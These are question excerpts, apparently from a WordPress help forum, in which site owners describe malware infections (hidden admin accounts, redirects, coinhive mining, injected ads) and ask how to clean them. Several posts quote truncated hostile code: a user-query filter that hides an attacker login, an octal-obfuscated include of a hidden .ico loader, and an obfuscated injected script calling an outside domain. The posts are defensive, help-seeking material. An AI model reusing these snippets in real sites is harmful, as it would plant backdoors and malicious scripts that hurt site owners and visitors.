So I am working on client's site and I found this code in the functions.php file highlighted as a virus. @!!!>$user_search->query_where=str_replace('WHERE 1=1',"WHERE 1=1 AND{$wpdb->users}.user_login!='f*****[email protected]'",$user Now I don't know php but it looks like it is trying to replace the user 1's email in the database with this email. I censored the email. am I right? but if so how is the attacker going to excite this? There has to be a trigger for this, right?
I bought a hosting and domain from Godaddy, Installed WordPress. Now the site is showing ads on every page after clicking anywhere on the pages or in the admin section as well. I have tried manual WordPress install also, changed the cPanel password, FTP password. Removed all files before fresh install. It starts showing ads immediately after install. Please suggest a solution.
I would like to inform and request help from the community. What happens is this malware was in the folder / wp-content / uploads / 2020 / Named index.php And I found him in the year 2017 in the uploads folder. What I find strange is that it was not detectable by any online database and not even the Sucuri plugin, Wordfense .. Follow the code (Good part of it was deleted, due to not fit in the post) Below …
I'm developing a plugin and would like to know how do I send automatic updates to it? Do I have to use webhooks for this? The plugin will be for private use, it will scan the website to remove malware, however there is always the possibility of creating new malware outside of those that are already included in the removal list. Thank you.
My wordpress site got recently hacked. Upon research I found 3 files were infected : index.php wp-config.php wp-settings.php All including this piece of code : @include "\057h\157m\145/mywebsite/\160u\142l\151c\137h\164m\154/\167p\055c\157n\164e\156t\057c\141c\150e\057a\154l\057.\062d\061c\061b\144d\056i\143o"; Decoding the octal characters reveals it's trying to include a file called .2d1c1bdd.ico. The file essentially contains the main code of the malware encrypted using simple php libraries like urlencode. Decoding it reveals the following : <?php if (!defined('stream_context_create ')) { define('stream_context_create ', 1); @ini_set('error_log', null); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @error_reporting(0); @set_time_limit(0); if …
I have a malware java script that was added to the end of every post. I tried using an SQL statement in phpMyAdmin. Here is a shortened version of that: SET @virus = "<script>var _0x2cf4=['MSIE"+CHAR(59)+"','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById'...(and a lot more obfuscated script)...; UPDATE wp_posts SET post_content = REPLACE ( post_content, @virus COLLATE utf8mb4_unicode_520_ci, '' ); This was not initially successful because many false matches caused deletions all over the website. I didn't have time to find out why, so I shortened the …
I am facing a big problem with my server. I have a website that keeps getting massive page requests coming from "Bing/Msn" bot every second or two and the ip changes now and then. Which is putting a heavy load on my server. My CPU is constantly over 90% I tried to block the bot from htaccess and robots.txt but they don't seem to have any effect. If anyone has an idea how to defeat this it would be much …
I have cPanel and all my websites got infected with coinhive malware. I searched through all files for coinhive keyword, ran multiple scanners, and even bought cPanel antivirus. Ran database search also. I found couple malware files but nothing resolved it. Here's sucuri scan - https://sitecheck.sucuri.net/results/appleservis.rs Where it can be located? I think it's some base64 or eval function but can't find it. Any help is appreciated!
Today while working, I had tried to install Go Pricing Plugin from this website. https://www.downloadfreethemes.download/go-pricing-v3-3-8-wordpress-responsive-pricing-tables/ It was unsuccessful at the first time then I tried for several times but no result. then after some time, my website went blank. I searched for Xampp errors, tried to deactivate plugins from the database(I could not access admin nor frontend) Then finally, I have found this code in function.php Is it something I have to worry? Is there any place where I can …
I am facing quite a problem with spam-bots, and could really use some advice. My WP website/phpBB forum uses a WordPress to phpBB bridge, to allow integration of users/registration from phpBB to WordPress. I have disabled registration from WordPress entirely and kept registration through phpBB. Somehow I am constantly getting spam registrations, After examining the MySQL database I noticed the user entries do not include an email address or password. How is it possible for a spam-bot to bypass the …
I'm trying to integrate some analytics into my site and whilst debugging why mine wasn't working, I found this line being put in the head of my document: <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-75655200-4&amp;l=c69d3b65dc6d40db98d2e3ee3cc1fd37"></script> Now... It's weird because I've disabled any plugins I had doing google analytics. Additionally, when I look up that account ID, I find references to some company called KyinWebSEO that I've never heard of or done any kind of business with (that exact tag is on the source of …
I was hired to build a new website for a company who's old website has turned into a dumpster fire. I was then asked to migrate over 1000 blog posts from the old website to the new website. This has come with its own problems as everything is running on ancient versions of everything and the export is massive. During all of this troubleshooting I was informed that the old website has something called a "zeus" virus. So my question …
I have a bunch of WordPress sites that I host with the same hosting company. I manage them with the same account so they sit in the same root directory. I noticed that one of my sites was infected with malware. Is there a quicker way for me to check all my sites other than installing an anti-virus plugin in each of my websites and scanning that website? It's hosted with a webhosting company so I cannot install software on …
Have a great problem, in title wordpress site sometimes (random) added inject code (screenshoot). After code added site redirection on page with banners. Change server pass, change users pass, add google authentification and change enter point (not wp-login.php), but inject work everyday. Wordpress 4.9.4. How stop it?
I have a blog on wordpress and is hosted on godaddy. I continously getting few of the core wordpress files changed automatically. My blog project is on git so I can figure it out easily and reset the git commit version. Even I can see few new .ico files are added. I am really frustrated out of it. The google ads and google adverts are getting blocked due to these files. How can I get rid of this auto change …
I recently submitted my website to adwords and it was rejected due to malacious software or link. The link detected in www.ws30.coinhive.com . I have scanned my wordpress website using plugins such as wordfence, sucuri etc. but none seem to delete the malacious link. I am a newbie and i used a page builder to make this website, so i have no coding knowledge. Can you please suggest step-wise, where can i find this link and remove it? any youtube …
A couple months back, I installed UpdraftPlus (free version) on my WordPress.org site. To my horror, immediately afterwards we started getting popups that would redirect to spam sites when you clicked 'Ok'. I uninstalled UpdraftPlus but the problem persisted. Google yielded a link to someone with a very similar problem - a reply told me where to find any extra files which may have been leftover. Sure enough, in that location I found some UpdraftPlus German language files remaining. As …
In my wordpress site virus script added in footer on wp_footer action. I try many techniques, but i cant find virus hook location. Is there any wp action/filter, that hook after each action /filter hooked including hooked output data? I mean, if some one hook add_action("wp_footer","abc"); function abc(){ echo "inside content"; } I want this. output: inside content function ABC, file : foo.php I am using this code, that only return list of hooks. add_action('wp', function(){ echo '<pre>'; print_r($GLOBALS['wp_filter']); echo …
I have wordpress 3.5.1 on Debian Squeeze. Every time before the page loads javascript alert appears with message 2819371938193817109948281937271937 and have to click OK to see the page. I get this with every refresh or clicking on some post. I did nothing since the last time when website was working fine. Screenshot: The source code: <script>alert("2819371938193817109948281937271937");</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> The header.php doesn't have this script and nothing is loading before header.php. What is happening? How …